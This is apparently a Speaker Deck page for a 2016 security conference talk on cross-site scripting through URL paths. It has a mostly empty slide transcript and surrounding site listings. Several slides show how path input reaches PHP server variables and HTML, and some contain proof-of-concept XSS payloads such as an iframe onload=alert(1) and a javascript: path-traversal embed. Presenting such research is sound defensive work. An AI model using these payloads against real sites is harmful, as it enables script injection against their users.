Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSS Attacks through PATH

Masato Kinugawa
April 06, 2016
Technology
8
18k

XSS Attacks through PATH

English version of my presentation in Shibuya.XSS techtalk #7
Japanese version is here: https://speakerdeck.com/masatokinugawa/shibuya-dot-xss-techtalk-number-7

Masato Kinugawa

April 06, 2016
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
masatokinugawa
1
370
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
3.6k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2.2k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
19k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
21k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
20
6.9k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
98k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
26k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
12k

Other Decks in Technology

See All in Technology
さくらの夕べ Debianナイト - さくらのVPS編
dictoss
0
180
近年の PyCon 情勢から見た PyCon APAC のまとめ
terapyon
0
280
はてなの開発20年史と DevOpsの歩み / DevOpsDays Tokyo 2025 Keynote
daiksy
5
1.3k
AWSLambdaMCPServerを使ってツールとMCPサーバを分離する
tkikuchi
1
1.7k
AI AgentOps LT大会(2025/04/16) Algomatic伊藤発表資料
kosukeito
0
120
Langchain4j y Ollama - Integrando LLMs con programas Java @ Commit Conf 2025
deors
1
130
Zabbixチョットデキルとは!?
kujiraitakahiro
0
160
Amazon S3 Tables + Amazon Athena / Apache Iceberg
okaru
0
230
大AI時代で輝くために今こそドメインにディープダイブしよう / Deep Dive into Domain in AI-Agent-Era
yuitosato
1
260
データベースで見る『家族アルバム みてね』の変遷 / The Evolution of Family Album Through the Lens of Databases
kohbis
4
1.1k
Creating Awesome Change in SmartNews
martin_lover
1
220
Ops-JAWS_Organizations小ネタ3選.pdf
chunkof
2
110

Featured

See All Featured
Docker and Python
trallard
44
3.3k
GraphQLとの向き合い方2022年版
quramy
46
14k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
Product Roadmaps are Hard
iamctodd
PRO
52
11k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
45
9.5k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
13
660
XXLCSS - How to scale CSS and keep your sanity
sugarenia
248
1.3M
RailsConf 2023
tenderlove
30
1.1k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
How GitHub (no longer) Works
holman
314
140k
For a Future-Friendly Web
brad_frost
176
9.7k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
40
7.2k

Transcript

  1. None
  2. None
  3. None
  4. None

  5. FIRST H A L F

  6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

  7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

  8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

  9. None

  10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

  11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

  12. None

  13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

  14. GET /path?query HTTP/1.1 The URI which was given in order

    to access this page; for instance, '/index.html'. http://php.net/manual/ja/reserved.variables.server.php

  15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

  16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b>

  17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

  18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E

  19. None

  20. LATER H A L F

  21. None
  22. None
  23. None
  24. None
  25. None
  26. None
  27. None
  28. None
  29. None
  30. None
  31. None
  32. None
  33. None

  34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

  35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

  36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

  37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe>

  38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

  39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None